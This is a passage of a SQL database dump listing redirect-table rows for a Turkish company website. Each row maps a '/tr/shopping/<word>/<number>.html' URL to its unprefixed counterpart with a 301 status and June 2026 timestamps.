00:00:00',301),(72021,'https://3s-technologies.com.tr/tr/shopping/futuritial/872804322.html',NULL,'https://3s-technologies.com.tr/shopping/futuritial/872804322.html','',1,0,'2026-06-11 04:07:58','0000-00-00 00:00:00',301),(72022,'https://3s-technologies.com.tr/tr/shopping/nondiscriminationn/365915072.html',NULL,'https://3s-technologies.com.tr/shopping/nondiscriminationn/365915072.html','',1,0,'2026-06-11 04:08:03','0000-00-00 00:00:00',301),(72023,'https://3s-technologies.com.tr/tr/shopping/dissert/3178152975.html',NULL,'https://3s-technologies.com.tr/shopping/dissert/3178152975.html','',1,0,'2026-06-11 04:08:06','0000-00-00 00:00:00',301),(72024,'https://3s-technologies.com.tr/tr/shopping/postrider/2878825511.html',NULL,'https://3s-technologies.com.tr/shopping/postrider/2878825511.html','',1,0,'2026-06-11 04:08:09','0000-00-00 00:00:00',301),(72025,'https://3s-technologies.com.tr/tr/shopping/spindleshaped/684558776.html',NULL,'https://3s-technologies.com.tr/shopping/spindleshaped/684558776.html','',1,0,'2026-06-11 04:08:12','0000-00-00 00:00:00',301),(72026,'https://3s-technologies.com.tr/tr/shopping/hunnish/393986847.html',NULL,'https://3s-technologies.com.tr/shopping/hunnish/393986847.html','',1,0,'2026-06-11 04:08:15','0000-00-00 00:00:00',301),(72027,'https://3s-technologies.com.tr/tr/shopping/punished/3678759402.html',NULL,'https://3s-technologies.com.tr/shopping/punished/3678759402.html','',1,0,'2026-06-11 04:08:18','0000-00-00 00:00:00',301),(72028,'https://3s-technologies.com.tr/tr/shopping/aprication/4025009605.html',NULL,'https://3s-technologies.com.tr/shopping/aprication/4025009605.html','',1,0,'2026-06-11 04:08:21','0000-00-00 00:00:00',301),(72029,'https://3s-technologies.com.tr/tr/shopping/melica/2432457485.html',NULL,'https://3s-technologies.com.tr/shopping/melica/2432457485.html','',1,0,'2026-06-11 04:08:24','0000-00-00 00:00:00',301),(72030,'https://3s-technologies.com.tr/tr/shopping/judicially/184876581.html',NULL,'https://3s-technologies.com.tr/shopping/judicially/184876581.html','',1,0,'2026-06-11 04:08:27','0000-00-00 00:00:00',301),(72031,'https://3s-technologies.com.tr/tr/shopping/hungerer/3434427109.html',NULL,'https://3s-technologies.com.tr/shopping/hungerer/3434427109.html','',1,0,'2026-06-11 04:08:30','0000-00-00 00:00:00',301),(72032,'https://3s-technologies.com.tr/tr/shopping/onopordon/503887212.html',NULL,'https://3s-technologies.com.tr/shopping/onopordon/503887212.html','',1,0,'2026-06-11 04:08:33','0000-00-00 00:00:00',301),(72033,'https://3s-technologies.com.tr/tr/shopping/prearrange/2064291668.html',NULL,'https://3s-technologies.com.tr/shopping/prearrange/2064291668.html','',1,0,'2026-06-11 04:08:36','0000-00-00 00:00:00',301),(72034,'https://3s-technologies.com.tr/tr/shopping/reredos/803845664.html',NULL,'https://3s-technologies.com.tr/shopping/reredos/803845664.html','',1,0,'2026-06-11 04:08:39','0000-00-00 00:00:00',301),(72035,'https://3s-technologies.com.tr/tr/shopping/cnemial/4151185918.html',NULL,'https://3s-technologies.com.tr/shopping/cnemial/4151185918.html','',1,0,'2026-06-11 04:08:42','0000-00-00 00:00:00',301),(72036,'https://3s-technologies.com.tr/tr/shopping/patties/3017883135.html',NULL,'https://3s-technologies.com.tr/shopping/patties/3017883135.html','',1,0,'2026-06-11 04:08:45','0000-00-00 00:00:00',301),(72037,'https://3s-technologies.com.tr/tr/shopping/crookedness/2165201731.html',NULL,'https://3s-technologies.com.tr/shopping/crookedness/2165201731.html','',1,0,'2026-06-11 04:08:48','0000-00-00 00:00:00',301),(72038,'https://3s-technologies.com.tr/tr/shopping/precipice/4164281413.html',NULL,'https://3s-technologies.com.tr/shopping/precipice/4164281413.html','',1,0,'2026-06-11 04:08:51','0000-00-00 00:00:00',301),(72039,'https://3s-technologies.com.tr/tr/shopping/sciscitation/1547207647.html',NULL,'https://3s-technologies.com.tr/shopping/sciscitation/1547207647.html','',1,0,'2026-06-11 04:08:54','0000-00-00 00:00:00',301),(72040,'https://3s-technologies.com.tr/tr/shopping/spalacopus/4273015103.html',NULL,'https://3s-technologies.com.tr/shopping/spalacopus/4273015103.html','',1,0,'2026-06-11 04:09:00','0000-00-00 00:00:00',301),(72041,'https://3s-technologies.com.tr/tr/shopping/intestine/2281689375.html',NULL,'https://3s-technologies.com.tr/shopping/intestine/2281689375.html','',1,0,'2026-06-11 04:09:04','0000-00-00 00:00:00',301),(72042,'https://3s-technologies.com.tr/tr/shopping/trenchermen/1410494378.html',NULL,'https://3s-technologies.com.tr/shopping/trenchermen/1410494378.html','',1,0,'2026-06-11 04:09:07','0000-00-00 00:00:00',301),(72043,'https://3s-technologies.com.tr/tr/shopping/delightsome/81863413.html',NULL,'https://3s-technologies.com.tr/shopping/delightsome/81863413.html','',1,0,'2026-06-11 04:09:10','0000-00-00 00:00:00',301),(72044,'https://3s-technologies.com.tr/tr/shopping/rotundate/4041981097.html',NULL,'https://3s-technologies.com.tr/shopping/rotundate/4041981097.html','',1,0,'2026-06-11 04:09:13','0000-00-00 00:00:00',301),(72045,'https://3s-technologies.com.tr/tr/shopping/anobiidae/3071967799.html',NULL,'https://3s-technologies.com.tr/shopping/anobiidae/3071967799.html','',1,0,'2026-06-11 04:09:16','0000-00-00 00:00:00',301),(72046,'https://3s-technologies.com.tr/tr/shopping/photographical/84018616.html',NULL,'https://3s-technologies.com.tr/shopping/photographical/84018616.html','',1,0,'2026-06-11 04:09:19','0000-00-00 00:00:00',301),(72047,'https://3s-technologies.com.tr/tr/shopping/fairnatured/2302078523.html',NULL,'https://3s-technologies.com.tr/shopping/fairnatured/2302078523.html','',1,0,'2026-06-11 04:09:22','0000-00-00 00:00:00',301),(72048,'https://3s-technologies.com.tr/tr/shopping/partitionist/2905365345.html',NULL,'https://3s-technologies.com.tr/shopping/partitionist/2905365345.html','',1,0,'2026-06-11 04:09:25','0000-00-00 00:00:00',301),(72049,'https://3s-technologies.com.tr/tr/shopping/discipless/521262900.html',NULL,'https://3s-technologies.com.tr/shopping/discipless/521262900.html','',1,0,'2026-06-11 04:09:28','0000-00-00 00:00:00',301),(72050,'https://3s-technologies.com.tr/tr/shopping/screamers/3101811231.html',NULL,'https://3s-technologies.com.tr/shopping/screamers/3101811231.html','',1,0,'2026-06-11 04:09:31','0000-00-00 00:00:00',301),(72051,'https://3s-technologies.com.tr/tr/shopping/tusked/1401289313.html',NULL,'https://3s-technologies.com.tr/shopping/tusked/1401289313.html','',1,0,'2026-06-11 04:09:34','0000-00-00 00:00:00',301),(72052,'https://3s-technologies.com.tr/tr/shopping/innodate/2973323047.html',NULL,'https://3s-technologies.com.tr/shopping/innodate/2973323047.html','',1,0,'2026-06-11 04:09:37','0000-00-00 00:00:00',301),(72053,'https://3s-technologies.com.tr/tr/shopping/catholicos/3653739624.html',NULL,'https://3s-technologies.com.tr/shopping/catholicos/3653739624.html','',1,0,'2026-06-11 04:09:40','0000-00-00 00:00:00',301),(72054,'https://3s-technologies.com.tr/tr/shopping/pannose/836431115.html',NULL,'https://3s-technologies.com.tr/shopping/pannose/836431115.html','',1,0,'2026-06-11 04:09:43','0000-00-00 00:00:00',301),(72055,'https://3s-technologies.com.tr/tr/shopping/eelpout/3659846923.html',NULL,'https://3s-technologies.com.tr/shopping/eelpout/3659846923.html','',1,0,'2026-06-11 04:09:46','0000-00-00 00:00:00',301),(72056,'https://3s-technologies.com.tr/tr/shopping/hegel/824812257.html',NULL,'https://3s-technologies.com.tr/shopping/hegel/824812257.html','',1,0,'2026-06-11 04:09:49','0000-00-00 00:00:00',301),(72057,'https://3s-technologies.com.tr/tr/shopping/aerostatics/4160055886.html',NULL,'https://3s-technologies.com.tr/shopping/aerostatics/4160055886.html','',1,0,'2026-06-11 04:09:52','0000-00-00 00:00:00',301),(72058,'https://3s-technologies.com.tr/tr/shopping/costliness/3665647810.html',NULL,'https://3s-technologies.com.tr/shopping/costliness/3665647810.html','',1,0,'2026-06-11 04:09:55','0000-00-00 00:00:00',301),(72059,'https://3s-technologies.com.tr/tr/shopping/hurry/2777157812.html',NULL,'https://3s-technologies.com.tr/shopping/hurry/2777157812.html','',1,0,'2026-06-11 04:10:01','0000-00-00 00:00:00',301),(72060,'https://3s-technologies.com.tr/tr/shopping/ataman/2208174674.html',NULL,'https://3s-technologies.com.tr/shopping/ataman/2208174674.html','',1,0,'2026-06-11 04:10:03','0000-00-00 00:00:00',301),(72061,'https://3s-technologies.com.tr/tr/shopping/stridulatory/3460882444.html',NULL,'https://3s-technologies.com.tr/shopping/stridulatory/3460882444.html','',1,0,'2026-06-11 04:10:06','0000-00-00 00:00:00',301),(72062,'https://3s-technologies.com.tr/tr/shopping/apieces/3663223612.html',NULL,'https://3s-technologies.com.tr/shopping/apieces/3663223612.html','',1,0,'2026-06-11 04:10:09','0000-00-00 00:00:00',301),(72063,'https://3s-technologies.com.tr/tr/shopping/adapa/1407253723.html',NULL,'https://3s-technologies.com.tr/shopping/adapa/1407253723.html','',1,0,'2026-06-11 04:10:12','0000-00-00 00:00:00',301),(72064,'https://3s-technologies.com.tr/tr/shopping/ardently/2980145569.html',NULL,'https://3s-technologies.com.tr/shopping/ardently/2980145569.html','',1,0,'2026-06-11 04:10:15','0000-00-00 00:00:00',301),(72065,'https://3s-technologies.com.tr/tr/shopping/quince/2970264195.html',NULL,'https://3s-technologies.com.tr/shopping/quince/2970264195.html','',1,0,'2026-06-11 04:10:18','0000-00-00 00:00:00',301),(72066,'https://3s-technologies.com.tr/tr/shopping/broussonetia/3521403636.html',NULL,'https://3s-technologies.com.tr/shopping/broussonetia/3521403636.html','',1,0,'2026-06-11 04:10:21','0000-00-00 00:00:00',301),(72067,'https://3s-technologies.com.tr/tr/shopping/unaccessible/2486328936.html',NULL,'https://3s-technologies.com.tr/shopping/unaccessible/2486328936.html','',1,0,'2026-06-11 04:10:24','0000-00-00 00:00:00',301),(72068,'https://3s-technologies.com.tr/tr/shopping/carnalmindedness/3747763484.html',NULL,'https://3s-technologies.com.tr/shopping/carnalmindedness/3747763484.html','',1,0,'2026-06-11 04:10:27','0000-00-00 00:00:00',301),(72069,'https://3s-technologies.com.tr/tr/shopping/corrugator/3575582711.html',NULL,'https://3s-technologies.com.tr/shopping/corrugator/3575582711.html','',1,0,'2026-06-11 04:10:30','0000-00-00 00:00:00',301),(72070,'https://3s-technologies.com.tr/tr/shopping/grumous/3530516521.html',NULL,'https://3s-technologies.com.tr/shopping/grumous/3530516521.html','',1,0,'2026-06-11 04:10:33','0000-00-00 00:00:00',301),(72071,'https://3s-technologies.com.tr/tr/shopping/micellae/4271168350.html',NULL,'https://3s-technologies.com.tr/shopping/micellae/4271168350.html','',1,0,'2026-06-11 04:10:36','0000-00-00 00:00:00',301),(72072,'https://3s-technologies.com.tr/tr/shopping/tyloses/2695851888.html',NULL,'https://3s-technologies.com.tr/shopping/tyloses/2695851888.html','',1,0,'2026-06-11 04:10:39','0000-00-00 00:00:00',301),(72073,'https://3s-technologies.com.tr/tr/shopping/curtsy/1451514254.html',NULL,'https://3s-technologies.com.tr/shopping/curtsy/1451514254.html','',1,0,'2026-06-11 04:10:44','0000-00-00 00:00:00',301),(72074,'https://3s-technologies.com.tr/tr/shopping/brosimum/3712206750.html',NULL,'https://3s-technologies.com.tr/shopping/brosimum/3712206750.html','',1,0,'2026-06-11 04:10:47','0000-00-00 00:00:00',301),(72075,'https://3s-technologies.com.tr/tr/shopping/nonmedullated/4069783877.html',NULL,'https://3s-technologies.com.tr/shopping/nonmedullated/4069783877.html','',1,0,'2026-06-11 04:10:50','0000-00-00 00:00:00',301),(72076,'https://3s-technologies.com.tr/tr/shopping/bellarmine/1595970384.html',NULL,'https://3s-technologies.com.tr/shopping/bellarmine/1595970384.html','',1,0,'2026-06-11 04:10:53','0000-00-00 00:00:00',301),(72077,'https://3s-technologies.com.tr/tr/shopping/nicked/1613273339.html',NULL,'https://3s-technologies.com.tr/shopping/nicked/1613273339.html','',1,0,'2026-06-11 04:10:56','0000-00-00 00:00:00',301),(72078,'https://3s-technologies.com.tr/tr/shopping/despume/1210899465.html',NULL,'https://3s-technologies.com.tr/shopping/despume/1210899465.html','',1,0,'2026-06-11 04:10:59','0000-00-00 00:00:00',301),(72079,'https://3s-technologies.com.tr/tr/shopping/embolismal/2256235025.html',NULL,'https://3s-technologies.com.tr/shopping/embolismal/2256235025.html','',1,0,'2026-06-11 04:11:01','0000-00-00 00:00:00',301),(72080,'https://3s-technologies.com.tr/tr/shopping/dolichocephal/3197836142.html',NULL,'https://3s-technologies.com.tr/shopping/dolichocephal/3197836142.html','',1,0,'2026-06-11 04:11:05','0000-00-00 00:00:00',301),(72081,'https://3s-technologies.com.tr/tr/shopping/antiopa/550253479.html',NULL,'https://3s-technologies.com.tr/shopping/antiopa/550253479.html','',1,0,'2026-06-11 04:11:08','0000-00-00 00:00:00',301),(72082,'https://3s-technologies.com.tr/tr/shopping/nonimportation/3360818029.html',NULL,'https://3s-technologies.com.tr/shopping/nonimportation/3360818029.html','',1,0,'2026-06-11 04:11:11','0000-00-00 00:00:00',301),(72083,'https://3s-technologies.com.tr/tr/shopping/psaltriparus/3075344488.html',NULL,'https://3s-technologies.com.tr/shopping/psaltriparus/3075344488.html','',1,0,'2026-06-11 04:11:14','0000-00-00 00:00:00',301),(72084,'https://3s-technologies.com.tr/tr/shopping/herpetology/2147147484.html',NULL,'https://3s-technologies.com.tr/shopping/herpetology/2147147484.html','',1,0,'2026-06-11 04:11:17','0000-00-00 00:00:00',301),(72085,'https://3s-technologies.com.tr/tr/shopping/gratiolin/3074005890.html',NULL,'https://3s-technologies.com.tr/shopping/gratiolin/3074005890.html','',1,0,'2026-06-11 04:11:20','0000-00-00 00:00:00',301),(72086,'https://3s-technologies.com.tr/tr/shopping/mollities/3879016700.html',NULL,'https://3s-technologies.com.tr/shopping/mollities/3879016700.html','',1,0,'2026-06-11 04:11:23','0000-00-00 00:00:00',301),(72087,'https://3s-technologies.com.tr/tr/shopping/sympathetically/234583603.html',NULL,'https://3s-technologies.com.tr/shopping/sympathetically/234583603.html','',1,0,'2026-06-11 04:11:26','0000-00-00 00:00:00',301),(72088,'https://3s-technologies.com.tr/tr/shopping/barbecue/3611436354.html',NULL,'https://3s-technologies.com.tr/shopping/barbecue/3611436354.html','',1,0,'2026-06-11 04:11:29','0000-00-00 00:00:00',301),(72089,'https://3s-technologies.com.tr/tr/shopping/scincoidea/908763421.html',NULL,'https://3s-technologies.com.tr/shopping/scincoidea/908763421.html','',1,0,'2026-06-11 04:11:32','0000-00-00 00:00:00',301),(72090,'https://3s-technologies.com.tr/tr/shopping/sagoin/2442270557.html',NULL,'https://3s-technologies.com.tr/shopping/sagoin/2442270557.html','',1,0,'2026-06-11 04:11:35','0000-00-00 00:00:00',301),(72091,'https://3s-technologies.com.tr/tr/shopping/opinionator/3194459453.html',NULL,'https://3s-technologies.com.tr/shopping/opinionator/3194459453.html','',1,0,'2026-06-11 04:11:41','0000-00-00 00:00:00',301),(72092,'https://3s-technologies.com.tr/tr/shopping/tuckeri/2832227364.html',NULL,'https://3s-technologies.com.tr/shopping/tuckeri/2832227364.html','',1,0,'2026-06-11 04:11:42','0000-00-00 00:00:00',301),(72093,'https://3s-technologies.com.tr/tr/shopping/pantler/3634441022.html',NULL,'https://3s-technologies.com.tr/shopping/pantler/3634441022.html','',1,0,'2026-06-11 04:11:46','0000-00-00 00:00:00',301),(72094,'https://3s-technologies.com.tr/tr/shopping/devenustate/3581923873.html',NULL,'https://3s-technologies.com.tr/shopping/devenustate/3581923873.html','',1,0,'2026-06-11 04:11:49','0000-00-00 00:00:00',301),(72095,'https://3s-technologies.com.tr/tr/shopping/parochial/3142281429.html',NULL,'https://3s-technologies.com.tr/shopping/parochial/3142281429.html','',1,0,'2026-06-11 04:11:52','0000-00-00 00:00:00',301),(72096,'https://3s-technologies.com.tr/tr/shopping/antecedently/713102540.html',NULL,'https://3s-technologies.com.tr/shopping/antecedently/713102540.html','',1,0,'2026-06-11 04:11:55','0000-00-00 00:00:00',301),(72097,'https://3s-technologies.com.tr/tr/shopping/winnow/1712744051.html',NULL,'https://3s-technologies.com.tr/shopping/winnow/1712744051.html','',1,0,'2026-06-11 04:11:58','0000-00-00 00:00:00',301),(72098,'https://3s-technologies.com.tr/tr/shopping/langteraloo/3445210620.html',NULL,'https://3s-technologies.com.tr/shopping/langteraloo/3445210620.html','',1,0,'2026-06-11 04:12:01','0000-00-00 00:00:00',301),(72099,'https://3s-technologies.com.tr/tr/shopping/vesuvine/4235208393.html',NULL,'https://3s-technologies.com.tr/shopping/vesuvine/4235208393.html','',1,0,'2026-06-11 04:12:04','0000-00-00 00:00:00',301),(72100,'https://3s-technologies.com.tr/tr/shopping/tasimeter/817518620.html',NULL,'https://3s-technologies.com.tr/shopping/tasimeter/817518620.html','',1,0,'2026-06-11 04:12:12','0000-00-00 00:00:00',301),(72101,'https://3s-technologies.com.tr/tr/shopping/hyacinthus/3824124440.html',NULL,'https://3s-technologies.com.tr/shopping/hyacinthus/3824124440.html','',1,0,'2026-06-11 04:12:15','0000-00-00 00:00:00',301),(72102,'https://3s-technologies.com.tr/tr/shopping/banished/2330474990.html',NULL,'https://3s-technologies.com.tr/shopping/banished/2330474990.html','',1,0,'2026-06-11 04:12:18','0000-00-00 00:00:00',301),(72103,'https://3s-technologies.com.tr/tr/shopping/monticle/3844863387.html',NULL,'https://3s-technologies.com.tr/shopping/monticle/3844863387.html','',1,0,'2026-06-11 04:12:21','0000-00-00 00:00:00',301),(72104,'https://3s-technologies.com.tr/tr/shopping/cerebriformis/2802547487.html',NULL,'https://3s-technologies.com.tr/shopping/cerebriformis/2802547487.html','',1,0,'2026-06-11 04:12:24','0000-00-00 00:00:00',301),(72105,'https://3s-technologies.com.tr/tr/shopping/alluvion/1834860543.html',NULL,'https://3s-technologies.com.tr/shopping/alluvion/1834860543.html','',1,0,'2026-06-11 04:12:27','0000-00-00 00:00:00',301),(72106,'https://3s-technologies.com.tr/tr/shopping/panter/1266792678.html',NULL,'https://3s-technologies.com.tr/shopping/panter/1266792678.html','',1,0,'2026-06-11 04:12:30','0000-00-00 00:00:00',301),(72107,'https://3s-technologies.com.tr/tr/shopping/andrenid/2314332019.html',NULL,'https://3s-technologies.com.tr/shopping/andrenid/2314332019.html','',1,0,'2026-06-11 04:12:33','0000-00-00 00:00:00',301),(72108,'https://3s-technologies.com.tr/tr/shopping/adustible/3030561816.html',NULL,'https://3s-technologies.com.tr/shopping/adustible/3030561816.html','',1,0,'2026-06-11 04:12:36','0000-00-00 00:00:00',301),(72109,'https://3s-technologies.com.tr/tr/shopping/ahungered/3547358821.html',NULL,'https://3s-technologies.com.tr/shopping/ahungered/3547358821.html','',1,0,'2026-06-11 04:12:39','0000-00-00 00:00:00',301),(72110,'https://3s-technologies.com.tr/tr/shopping/sesqui/3117277893.html',NULL,'https://3s-technologies.com.tr/shopping/sesqui/3117277893.html','',1,0,'2026-06-11 04:12:42','0000-00-00 00:00:00',301),(72111,'https://3s-technologies.com.tr/tr/shopping/glutinosity/2114045478.html',NULL,'https://3s-technologies.com.tr/shopping/glutinosity/2114045478.html','',1,0,'2026-06-11 04:12:45','0000-00-00 00:00:00',301),(72112,'https://3s-technologies.com.tr/tr/shopping/brillante/4140048404.html',NULL,'https://3s-technologies.com.tr/shopping/brillante/4140048404.html','',1,0,'2026-06-11 04:12:48','0000-00-00 00:00:00',301),(72113,'https://3s-technologies.com.tr/tr/shopping/ellengeness/3528092323.html',NULL,'https://3s-technologies.com.tr/shopping/ellengeness/3528092323.html','',1,0,'2026-06-11 04:12:51','0000-00-00 00:00:00',301),(72114,'https://3s-technologies.com.tr/tr/shopping/umbellularia/103135415.html',NULL,'https://3s-technologies.com.tr/shopping/umbellularia/103135415.html','',1,0,'2026-06-11 04:12:54','0000-00-00 00:00:00',301),(72115,'https://3s-technologies.com.tr/tr/shopping/riotour/450172413.html',NULL,'https://3s-technologies.com.tr/shopping/riotour/450172413.html','',1,0,'2026-06-11 04:12:57','0000-00-00 00:00:00',301),(72116,'https://3s-technologies.com.tr/tr/shopping/reactionaries/3276726394.html',NULL,'https://3s-technologies.com.tr/shopping/reactionaries/3276726394.html','',1,0,'2026-06-11 04:13:00','0000-00-00 00:00:00',301),(72117,'https://3s-technologies.com.tr/tr/shopping/denunciatory/2965272200.html',NULL,'https://3s-technologies.com.tr/shopping/denunciatory/2965272200.html','',1,0,'2026-06-11 04:13:03','0000-00-00 00:00:00',301),(72118,'https://3s-technologies.com.tr/tr/shopping/gormandize/939346818.html',NULL,'https://3s-technologies.com.tr/shopping/gormandize/939346818.html','',1,0,'2026-06-11 04:13:06','0000-00-00 00:00:00',301),(72119,'https://3s-technologies.com.tr/tr/shopping/agenesic/3674248783.html',NULL,'https://3s-technologies.com.tr/shopping/agenesic/3674248783.html','',1,0,'2026-06-11 04:13:09','0000-00-00 00:00:00',301),(72120,'https://3s-technologies.com.tr/tr/shopping/discursist/3798585082.html',NULL,'https://3s-technologies.com.tr/shopping/discursist/3798585082.html','',1,0,'2026-06-11 04:13:12','0000-00-00 00:00:00',301),(72121,'https://3s-technologies.com.tr/tr/shopping/chancery/1316736968.html',NULL,'https://3s-technologies.com.tr/shopping/chancery/1316736968.html','',1,0,'2026-06-11 04:13:15','0000-00-00 00:00:00',301),(72122,'https://3s-technologies.com.tr/tr/shopping/inspire/1857602562.html',NULL,'https://3s-technologies.com.tr/shopping/inspire/1857602562.html','',1,0,'2026-06-11 04:13:18','0000-00-00 00:00:00',301),(72123,'https://3s-technologies.com.tr/tr/shopping/sagamore/2208809328.html',NULL,'https://3s-technologies.com.tr/shopping/sagamore/2208809328.html','',1,0,'2026-06-11 04:13:22','0000-00-00 00:00:00',301),(72124,'https://3s-technologies.com.tr/tr/shopping/cypreous/3730937426.html',NULL,'https://3s-technologies.com.tr/shopping/cypreous/3730937426.html','',1,0,'2026-06-11 04:13:24','0000-00-00 00:00:00',301),(72125,'https://3s-technologies.com.tr/tr/shopping/termatary/1725383686.html',NULL,'https://3s-technologies.com.tr/shopping/termatary/1725383686.html','',1,0,'2026-06-11 04:13:27','0000-00-00 00:00:00',301),(72126,'https://3s-technologies.com.tr/tr/shopping/impoofoo/781296856.html',NULL,'https://3s-technologies.com.tr/shopping/impoofoo/781296856.html','',1,0,'2026-06-11 04:13:30','0000-00-00 00:00:00',301),(72127,'https://3s-technologies.com.tr/tr/shopping/distaste/153034297.html',NULL,'https://3s-technologies.com.tr/shopping/distaste/153034297.html','',1,0,'2026-06-11 04:13:33','0000-00-00 00:00:00',301),(72128,'https://3s-technologies.com.tr/tr/shopping/telepone/1119392031.html',NULL,'https://3s-technologies.com.tr/shopping/telepone/1119392031.html','',1,0,'2026-06-11 04:13:41','0000-00-00 00:00:00',301),(72129,'https://3s-technologies.com.tr/tr/shopping/aneurine/2145935369.html',NULL,'https://3s-technologies.com.tr/shopping/aneurine/2145935369.html','',1,0,'2026-06-11 04:13:44','0000-00-00 00:00:00',301),(72130,'https://3s-technologies.com.tr/tr/shopping/caseworm/2264364009.html',NULL,'https://3s-technologies.com.tr/shopping/caseworm/2264364009.html','',1,0,'2026-06-11 04:13:47','0000-00-00 00:00:00',301),(72131,'https://3s-technologies.com.tr/tr/shopping/oversubtile/1952408532.html',NULL,'https://3s-technologies.com.tr/shopping/oversubtile/1952408532.html','',1,0,'2026-06-11 04:13:50','0000-00-00 00:00:00',301),(72132,'https://3s-technologies.com.tr/tr/shopping/unmodernized/3158028381.html',NULL,'https://3s-technologies.com.tr/shopping/unmodernized/3158028381.html','',1,0,'2026-06-11 04:13:53','0000-00-00 00:00:00',301),(72133,'https://3s-technologies.com.tr/tr/shopping/rings/613859039.html',NULL,'https://3s-technologies.com.tr/shopping/rings/613859039.html','',1,0,'2026-06-11 04:13:56','0000-00-00 00:00:00',301),(72134,'https://3s-technologies.com.tr/tr/shopping/dissiliency/1467387821.html',NULL,'https://3s-technologies.com.tr/shopping/dissiliency/1467387821.html','',1,0,'2026-06-11 04:14:03','0000-00-00 00:00:00',301),(72135,'https://3s-technologies.com.tr/tr/shopping/belie/2278524209.html',NULL,'https://3s-technologies.com.tr/shopping/belie/2278524209.html','',1,0,'2026-06-11 04:14:04','0000-00-00 00:00:00',301),(72136,'https://3s-technologies.com.tr/tr/shopping/atamasco/2295727974.html',NULL,'https://3s-technologies.com.tr/shopping/atamasco/2295727974.html','',1,0,'2026-06-11 04:14:07','0000-00-00 00:00:00',301),(72137,'https://3s-technologies.com.tr/tr/shopping/oxalic/3714630932.html',NULL,'https://3s-technologies.com.tr/shopping/oxalic/3714630932.html','',1,0,'2026-06-11 04:14:10','0000-00-00 00:00:00',301),(72138,'https://3s-technologies.com.tr/tr/shopping/majesticalness/239219195.html',NULL,'https://3s-technologies.com.tr/shopping/majesticalness/239219195.html','',1,0,'2026-06-11 04:14:13','0000-00-00 00:00:00',301),(72139,'https://3s-technologies.com.tr/tr/shopping/jollies/730330947.html',NULL,'https://3s-technologies.com.tr/shopping/jollies/730330947.html','',1,0,'2026-06-11 04:14:16','0000-00-00 00:00:00',301),(72140,'https://3s-technologies.com.tr/tr/shopping/tumpline/2822269845.html',NULL,'https://3s-technologies.com.tr/shopping/tumpline/2822269845.html','',1,0,'2026-06-11 04:14:19','0000-00-00 00:00:00',301),(72141,'https://3s-technologies.com.tr/tr/shopping/delightful/4179653712.html',NULL,'https://3s-technologies.com.tr/shopping/delightful/4179653712.html','',1,0,'2026-06-11 04:14:22','0000-00-00 00:00:00',301),(72142,'https://3s-technologies.com.tr/tr/shopping/diploe/1870714154.html',NULL,'https://3s-technologies.com.tr/shopping/diploe/1870714154.html','',1,0,'2026-06-11 04:14:25','0000-00-00 00:00:00',301),(72143,'https://3s-technologies.com.tr/tr/shopping/carapato/1765145662.html',NULL,'https://3s-technologies.com.tr/shopping/carapato/1765145662.html','',1,0,'2026-06-11 04:14:28','0000-00-00 00:00:00',301),(72144,'https://3s-technologies.com.tr/tr/shopping/dasypidae/121189814.html',NULL,'https://3s-technologies.com.tr/shopping/dasypidae/121189814.html','',1,0,'2026-06-11 04:14:31','0000-00-00 00:00:00',301),(72145,'https://3s-technologies.com.tr/tr/shopping/overlanguaged/3941210717.html',NULL,'https://3s-technologies.com.tr/shopping/overlanguaged/3941210717.html','',1,0,'2026-06-11 04:14:34','0000-00-00 00:00:00',301),(72146,'https://3s-technologies.com.tr/tr/shopping/casal/1183306009.html',NULL,'https://3s-technologies.com.tr/shopping/casal/1183306009.html','',1,0,'2026-06-11 04:14:37','0000-00-00 00:00:00',301),(72147,'https://3s-technologies.com.tr/tr/shopping/pouldavis/2254388272.html',NULL,'https://3s-technologies.com.tr/shopping/pouldavis/2254388272.html','',1,0,'2026-06-11 04:14:40','0000-00-00 00:00:00',301),(72148,'https://3s-technologies.com.tr/tr/shopping/impatible/2969311704.html',NULL,'https://3s-technologies.com.tr/shopping/impatible/2969311704.html','',1,0,'2026-06-11 04:14:43','0000-00-00 00:00:00',301),(72149,'https://3s-technologies.com.tr/tr/shopping/repassant/3049002354.html',NULL,'https://3s-technologies.com.tr/shopping/repassant/3049002354.html','',1,0,'2026-06-11 04:14:46','0000-00-00 00:00:00',301),(72150,'https://3s-technologies.com.tr/tr/shopping/madecassee/1293417520.html',NULL,'https://3s-technologies.com.tr/shopping/madecassee/1293417520.html','',1,0,'2026-06-11 04:14:49','0000-00-00 00:00:00',301),(72151,'https://3s-technologies.com.tr/tr/shopping/lilywort/568857524.html',NULL,'https://3s-technologies.com.tr/shopping/lilywort/568857524.html','',1,0,'2026-06-11 04:14:52','0000-00-00 00:00:00',301),(72152,'https://3s-technologies.com.tr/tr/shopping/tibrie/1116967817.html',NULL,'https://3s-technologies.com.tr/shopping/tibrie/1116967817.html','',1,0,'2026-06-11 04:14:55','0000-00-00 00:00:00',301),(72153,'https://3s-technologies.com.tr/tr/shopping/middleoftheroadism/3125533524.html',NULL,'https://3s-technologies.com.tr/shopping/middleoftheroadism/3125533524.html','',1,0,'2026-06-11 04:14:58','0000-00-00 00:00:00',301),(72154,'https://3s-technologies.com.tr/tr/shopping/heaven/2587255667.html',NULL,'https://3s-technologies.com.tr/shopping/heaven/2587255667.html','',1,0,'2026-06-11 04:15:01','0000-00-00 00:00:00',301),(72155,'https://3s-technologies.com.tr/tr/shopping/helwingia/3936621913.html',NULL,'https://3s-technologies.com.tr/shopping/helwingia/3936621913.html','',1,0,'2026-06-11 04:15:04','0000-00-00 00:00:00',301),(72156,'https://3s-technologies.com.tr/tr/shopping/disadvantageousness/2993006214.html',NULL,'https://3s-technologies.com.tr/shopping/disadvantageousness/2993006214.html','',1,0,'2026-06-11 04:15:07','0000-00-00 00:00:00',301),(72157,'https://3s-technologies.com.tr/tr/shopping/geodetic/3180317565.html',NULL,'https://3s-technologies.com.tr/shopping/geodetic/3180317565.html','',1,0,'2026-06-11 04:15:15','0000-00-00 00:00:00',301),(72158,'https://3s-technologies.com.tr/tr/shopping/coarsest/2243468743.html',NULL,'https://3s-technologies.com.tr/shopping/coarsest/2243468743.html','',1,0,'2026-06-11 04:15:18','0000-00-00 00:00:00',301),(72159,'https://3s-technologies.com.tr/tr/shopping/peristaltic/597237749.html',NULL,'https://3s-technologies.com.tr/shopping/peristaltic/597237749.html','',1,0,'2026-06-11 04:15:21','0000-00-00 00:00:00',301),(72160,'https://3s-technologies.com.tr/tr/shopping/chronophotograph/1331060675.html',NULL,'https://3s-technologies.com.tr/shopping/chronophotograph/1331060675.html','',1,0,'2026-06-11 04:15:24','0000-00-00 